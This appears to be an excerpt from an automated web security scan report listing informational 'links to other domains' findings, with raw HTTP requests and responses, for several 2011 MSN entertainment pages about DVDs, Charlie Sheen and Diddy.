http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.criterion.com/current/posts
http://www.criterionforum.org/forum/index.php
http://www.davekehr.com/
http://www.delish.com/
http://www.dvdbeaver.com/
http://www.dvdreview.com/
http://www.dvdtalk.com/
http://www.dvdtalk.com/dvdsavant/index.html
http://www.highdefdigest.com/
http://www.hometheaterforum.com/
http://www.hometheaterforum.com/forum/list/117
http://www.nitrateville.com/
http://www.parallax-view.org/
http://www.seanax.com/
http://www.silentera.com/index.html
http://www.thedigitalbits.com/
http://www.tvshowsondvd.com/
http://www.videowatchdog.blogspot.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345052&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blogpost.aspx%3Fpost%3D55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&lc=1033&id=250710
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=26628041ed41451f9975fddaa6b6aaba; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9AF5EF0758BA4E538D325E0F17C8292E; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345052&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blogpost.aspx%3Fpost%3D55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg" alt="" class="imagefloatright userImage lead" />More interesting (and far less commercial) is "<b>
...[SNIP]...
</blockquote><a href="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/" title="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/"><br />
...[SNIP]...
ttp://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
social.entertainment.msn.com/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.seanax.com">Sean Axmaker</a> is MSN's DVD columnist and the editor of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.parallax-view.org">Parallax View</a>
...[SNIP]...
<li class="first"><a href="http://www.criterionforum.org/forum/index.php">Criterion Forum</a>
...[SNIP]...
<li><a href="http://www.criterion.com/current/posts">Criterion Current</a>
...[SNIP]...
<li><a href="http://www.davekehr.com/">Dave Kehr</a></li><li><a href="http://www.thedigitalbits.com/">The Digital Bits</a>
...[SNIP]...
<li><a href="http://www.dvdbeaver.com/">DVD Beaver</a></li><li><a href="http://www.dvdreview.com/">DVD Review </a>
...[SNIP]...
<li><a href="http://www.dvdtalk.com/dvdsavant/index.html">DVD Savant</a></li><li><a href="http://www.dvdtalk.com/">DVD Talk</a></li><li><a href="http://www.highdefdigest.com/">High-Def Digest </a>
...[SNIP]...
<li><a href="http://www.hometheaterforum.com/">Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.nitrateville.com/">Nitrateville</a>
...[SNIP]...
<li><a href="http://www.silentera.com/index.html">Silent Era</a></li><li><a href="http://www.hometheaterforum.com/forum/list/117">Talk With the Insiders at Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.tvshowsondvd.com/">TV Shows on DVD</a>
...[SNIP]...
<li class="last"><a href="http://www.videowatchdog.blogspot.com/">Video Watchblog</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.302. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx?cp-documentid=27455681

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=charlie+sheen+rehab&form=msnpop
http://www.bing.com/search?q=charlie+sheen+spends+prostitutes+cocaine&form=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=denise+richards&form=msnpop
http://www.bing.com/search?q=jason+davis+arrested&form=msnpop
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=sheen+hernia&form=msnpop
http://www.bing.com/search?q=two+and+a+half+men+hiatus&form=msnpop
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/two-and-a-half-men-straight-from-the-heart/17ufqu9iu?q=two+and+a+half+men&FROM=LKVR5&GT1=LKVR5&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406701&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FCharlie-Sheen-checks-into-rehab-show-on-hiatus.aspx%3Fcp-documentid%3D27455681&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx?cp-documentid=27455681 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fda123bc754b442aadc60ee5ad19dddf; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2511CF056BC5418BB364016D5274BBF7; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:21 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406701&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FCharlie-Sheen-checks-into-rehab-show-on-hiatus.aspx%3Fcp-documentid%3D27455681&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+rehab&form=msnpop"><strong>
...[SNIP]...
<div>Charlie Sheen voluntarily <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+rehab&form=msnpop">entered a rehab center</a> for treatment, one day after he was rushed to a Los Angeles hospital (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=sheen+hernia&form=msnpop">for what?</a>)... While Sheen goes through recovery, his hit sitcom (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/two-and-a-half-men-straight-from-the-heart/17ufqu9iu?q=two+and+a+half+men&FROM=LKVR5&GT1=LKVR5&FORM=msnpop">watch clip</a>) is being put <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=two+and+a+half+men+hiatus&form=msnpop">on hiatus</a>
...[SNIP]...
<div>Sheen recently ran up <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+spends+prostitutes+cocaine&form=msnpop">an expensive tab</a>
...[SNIP]...
<div>He has two daughters with a <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=denise+richards&form=msnpop">Hollywood actress</a>
...[SNIP]...
<div>A <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jason+davis+arrested&form=msnpop">'Celebrity Rehab' graduate</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.303. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx?cp-documentid=27455681

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=charlie+sheen+rehab&form=msnpop
http://www.bing.com/search?q=charlie+sheen+spends+prostitutes+cocaine&form=msnpop
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=denise+richards&form=msnpop
http://www.bing.com/search?q=jason+davis+arrested&form=msnpop
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=sheen+hernia&form=msnpop
http://www.bing.com/search?q=two+and+a+half+men+hiatus&form=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/two-and-a-half-men-straight-from-the-heart/17ufqu9iu?q=two+and+a+half+men&FROM=LKVR5&GT1=LKVR5&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345082&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FCharlie-Sheen-checks-into-rehab-show-on-hiatus.aspx%3Fcp-documentid%3D27455681&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=bc9ead832d6044909d6af976359901c1; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EA5515447F1E4893A032A4545D8AD125; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345082&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FCharlie-Sheen-checks-into-rehab-show-on-hiatus.aspx%3Fcp-documentid%3D27455681&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+rehab&form=msnpop"><strong>
...[SNIP]...
<div>Charlie Sheen voluntarily <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+rehab&form=msnpop">entered a rehab center</a> for treatment, one day after he was rushed to a Los Angeles hospital (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=sheen+hernia&form=msnpop">for what?</a>)... While Sheen goes through recovery, his hit sitcom (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/two-and-a-half-men-straight-from-the-heart/17ufqu9iu?q=two+and+a+half+men&FROM=LKVR5&GT1=LKVR5&FORM=msnpop">watch clip</a>) is being put <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=two+and+a+half+men+hiatus&form=msnpop">on hiatus</a>
...[SNIP]...
<div>Sheen recently ran up <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+spends+prostitutes+cocaine&form=msnpop">an expensive tab</a>
...[SNIP]...
<div>He has two daughters with a <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=denise+richards&form=msnpop">Hollywood actress</a>
...[SNIP]...
<div>A <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jason+davis+arrested&form=msnpop">'Celebrity Rehab' graduate</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.304. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx?cp-documentid=27455006

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=p+diddy&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Diddy+and+1+trillion&form=msnpop
http://www.bing.com/search?q=Diddy+and+Hawaii+Five-O&go=&form=msnpop
http://www.bing.com/search?q=Elton+John+and+hip+hop+and++phenomenon&form=msnpop
http://www.bing.com/search?q=P+Diddy%27s+net+worth&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=diddy+and+beyonce+inspiration&form=msnpop
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=World+Trade+Center&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345080&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FDiddy-sued-for-%241-trillion.aspx%3Fcp-documentid%3D27455006&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx?cp-documentid=27455006 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:20 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=9a8c91ff4ad14e8a811cebb0c0f474e2; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F372C16564F749C8AB98043568B4614B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:20 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
